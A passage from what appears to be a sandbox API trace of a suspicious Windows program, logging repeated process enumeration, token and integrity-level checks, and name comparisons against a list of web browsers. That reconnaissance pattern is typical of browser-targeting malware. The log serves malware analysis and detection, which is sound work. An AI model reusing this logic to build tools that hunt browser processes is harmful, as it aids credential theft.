returned 1 [0218.053] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0218.053] GetLastError () returned 0x7a [0218.053] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0218.053] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0218.053] CloseHandle (hObject=0x36c) returned 1 [0218.053] CloseHandle (hObject=0x374) returned 1 [0218.053] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0x374 [0218.053] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d62a0, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.053] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x36c) returned 1 [0218.053] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0218.053] GetLastError () returned 0x7a [0218.053] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0218.053] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0218.053] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0218.053] CloseHandle (hObject=0x36c) returned 1 [0218.053] CloseHandle (hObject=0x374) returned 1 [0218.053] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0218.053] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0218.053] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0218.053] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0218.053] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0218.053] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0218.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0218.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0218.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x374 [0218.053] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x36c) returned 1 [0218.053] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0218.053] GetLastError () returned 0x7a [0218.054] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0218.054] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0218.054] CloseHandle (hObject=0x36c) returned 1 [0218.054] CloseHandle (hObject=0x374) returned 1 [0218.054] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x374 [0218.054] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d6928, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.054] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x36c) returned 1 [0218.054] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0218.054] GetLastError () returned 0x7a [0218.054] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0218.054] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0218.054] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0218.054] CloseHandle (hObject=0x36c) returned 1 [0218.054] CloseHandle (hObject=0x374) returned 1 [0218.054] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0218.054] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0218.054] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0218.054] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0218.054] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0218.054] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0218.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x114) returned 0x0 [0218.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x374 [0218.054] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x36c) returned 1 [0218.054] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0218.054] GetLastError () returned 0x7a [0218.054] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0218.054] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0218.054] CloseHandle (hObject=0x36c) returned 1 [0218.054] CloseHandle (hObject=0x374) returned 1 [0218.054] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x374 [0218.054] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d6ee0, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.054] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x36c) returned 1 [0218.055] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0218.055] GetLastError () returned 0x7a [0218.055] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0218.055] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0218.055] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0218.055] CloseHandle (hObject=0x36c) returned 1 [0218.055] CloseHandle (hObject=0x374) returned 1 [0218.055] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0218.055] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0218.055] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0218.055] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0218.055] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0218.055] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0218.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x374 [0218.055] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x36c) returned 1 [0218.055] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0218.055] GetLastError () returned 0x7a [0218.055] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0218.055] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0218.055] CloseHandle (hObject=0x36c) returned 1 [0218.055] CloseHandle (hObject=0x374) returned 1 [0218.055] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x374 [0218.055] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d7290, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.055] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x36c) returned 1 [0218.055] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0218.055] GetLastError () returned 0x7a [0218.055] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0218.055] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0218.055] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0218.055] CloseHandle (hObject=0x36c) returned 1 [0218.055] CloseHandle (hObject=0x374) returned 1 [0218.056] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0218.056] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0218.056] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0218.056] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0218.056] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0218.056] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0218.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x374 [0218.056] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x36c) returned 1 [0218.056] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0218.056] GetLastError () returned 0x7a [0218.056] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0218.056] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0218.056] CloseHandle (hObject=0x36c) returned 1 [0218.056] CloseHandle (hObject=0x374) returned 1 [0218.056] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x374 [0218.056] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d73e8, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.056] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x36c) returned 1 [0218.056] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0218.056] GetLastError () returned 0x7a [0218.056] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0218.056] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0218.056] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0218.056] CloseHandle (hObject=0x36c) returned 1 [0218.056] CloseHandle (hObject=0x374) returned 1 [0218.056] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0218.056] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0218.056] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0218.056] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0218.056] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0218.056] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0218.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x374 [0218.056] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x36c) returned 1 [0218.057] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0218.057] GetLastError () returned 0x7a [0218.057] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0218.057] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0218.057] CloseHandle (hObject=0x36c) returned 1 [0218.057] CloseHandle (hObject=0x374) returned 1 [0218.057] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x374 [0218.057] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d7568, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.057] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x36c) returned 1 [0218.057] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0218.057] GetLastError () returned 0x7a [0218.057] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0218.057] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0218.057] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0218.057] CloseHandle (hObject=0x36c) returned 1 [0218.057] CloseHandle (hObject=0x374) returned 1 [0218.057] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0218.057] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0218.057] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0218.057] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0218.057] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0218.057] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0218.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0x374 [0218.057] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x36c) returned 1 [0218.057] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0218.057] GetLastError () returned 0x7a [0218.057] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0218.057] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0218.057] CloseHandle (hObject=0x36c) returned 1 [0218.057] CloseHandle (hObject=0x374) returned 1 [0218.057] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0x374 [0218.058] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d76c8, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.058] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x36c) returned 1 [0218.058] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0218.058] GetLastError () returned 0x7a [0218.058] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0218.058] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0218.058] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0218.058] CloseHandle (hObject=0x36c) returned 1 [0218.058] CloseHandle (hObject=0x374) returned 1 [0218.058] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0218.058] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0218.058] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0218.058] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0218.058] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0218.058] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0218.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0x374 [0218.058] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x36c) returned 1 [0218.058] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0218.058] GetLastError () returned 0x7a [0218.058] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0218.058] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0218.058] CloseHandle (hObject=0x36c) returned 1 [0218.058] CloseHandle (hObject=0x374) returned 1 [0218.058] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0x374 [0218.058] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, 